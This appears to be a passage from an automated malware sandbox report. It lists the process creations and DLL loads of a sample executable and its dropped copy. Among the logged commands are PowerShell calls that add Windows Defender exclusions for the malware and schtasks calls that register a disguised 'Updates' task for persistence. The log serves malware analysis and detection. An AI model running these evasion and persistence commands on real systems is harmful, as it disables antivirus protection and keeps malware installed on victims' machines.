                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Users\user\Desktop\Uv4EriqDCj.exe "C:\Users\user\Desktop\Uv4EriqDCj.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: iconcodecservice.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeSection loaded: windowscodecs.dll
